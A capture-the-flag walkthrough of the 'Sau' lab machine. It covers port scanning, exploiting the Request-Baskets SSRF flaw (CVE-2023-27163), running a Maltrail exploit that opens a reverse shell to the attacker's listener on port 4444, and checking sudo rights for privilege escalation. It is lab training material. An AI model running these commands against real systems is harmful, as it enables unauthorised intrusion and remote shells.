# TCP SYN all ports scanningsudo nmap -sS-sC-sV-O-Pn--min-rate 10000 -p- sau
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
55555/tcp open unknown
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 400 Bad Request
| Content-Type: text/plain;charset=utf-8
| X-Content-Type-Options: nosniff
| Date: Mon, 04 Dec 2023 13:59:49 GMT
| Content-Length: 75
| invalid basket name; the name does not match pattern: ^[wd-_\.]{1,250}$
| GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain;charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Content-Type: text/html;charset=utf-8
| Location: /web
| Date: Mon, 04 Dec 2023 13:59:22 GMT
| Content-Length: 27
| href="/web">Found</a>.
| HTTPOptions:
| HTTP/1.0 200 OK
| Allow: GET, OPTIONS
| Date: Mon, 04 Dec 2023 13:59:22 GMT
|_ Content-Length: 0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
2. Initial Foothold
Request Baskets is a web service designed to capture arbitrary HTTP requests and facilitate their inspection through either a RESTful API or a straightforward web user interface.
CVE-2023-27163 represents a critical Server-Side Request Forgery (SSRF) vulnerability that was identified in Request-Baskets, affecting all versions up to and including 1.2.1. This particular vulnerability grants malicious actors the ability to gain unauthorized access to network resources and sensitive information by exploiting the /api/baskets/{name} component through carefully crafted API requests.
As previously mentioned, Request-Baskets operates as a web application designed to collect and log incoming HTTP requests directed to specific endpoints known as “baskets.” During the creation of these baskets, users have the flexibility to specify alternative servers to which these requests should be forwarded. The critical issue here lies in the fact that users can inadvertently specify services they shouldn’t have access to, including those typically restricted within a network environment.
For example, consider a scenario where the server hosts Request-Baskets on port 55555 and simultaneously runs a Flask web server on port 8000. The Flask server, however, is configured to exclusively interact with the localhost. In this context, an attacker can exploit the SSRF vulnerability by creating a basket that forwards requests to http://localhost:8000, effectively bypassing the previous network restrictions and gaining access to the Flask web server, which should have been restricted to local access only.
# enumerating internal webserver
./CVE-2023-27163.sh http://sau:55555 http://localhost:80
Proof-of-Concept of SSRF on Request-Baskets (CVE-2023-27163)|| More info at https://github.com/entr0pie/CVE-2023-27163
> Creating the "kwpjxa" proxy basket...
> Basket created!
> Accessing http://sau:55555/kwpjxa now makes the server request to http://localhost:80.
> Authorization: TOXDrjpjR4bfvkkSGah34Nvu3r8L7pv3mV3ECGG_IacT
# running maltrail PoC through request-baskets
python3 exploit.py 10.10.14.4 4444 http://sau:55555/kwpjxa
Running exploit on http://sau:55555/kwpjxa/login
1
2
3
4
5
# catching a shell
nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.4] from (UNKNOWN)[10.10.11.224] 33162
$
1
2
3
# user flag
puma@sau:~$ cat ~/user.txt
cat ~/user.txt
3. Privilege Escalation
1
2
3
4
5
6
7
8
9
# checking perms
puma@sau:~$ sudo-lsudo-l
Matching Defaults entries for puma on sau:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User puma may run the following commands on sau:
(ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service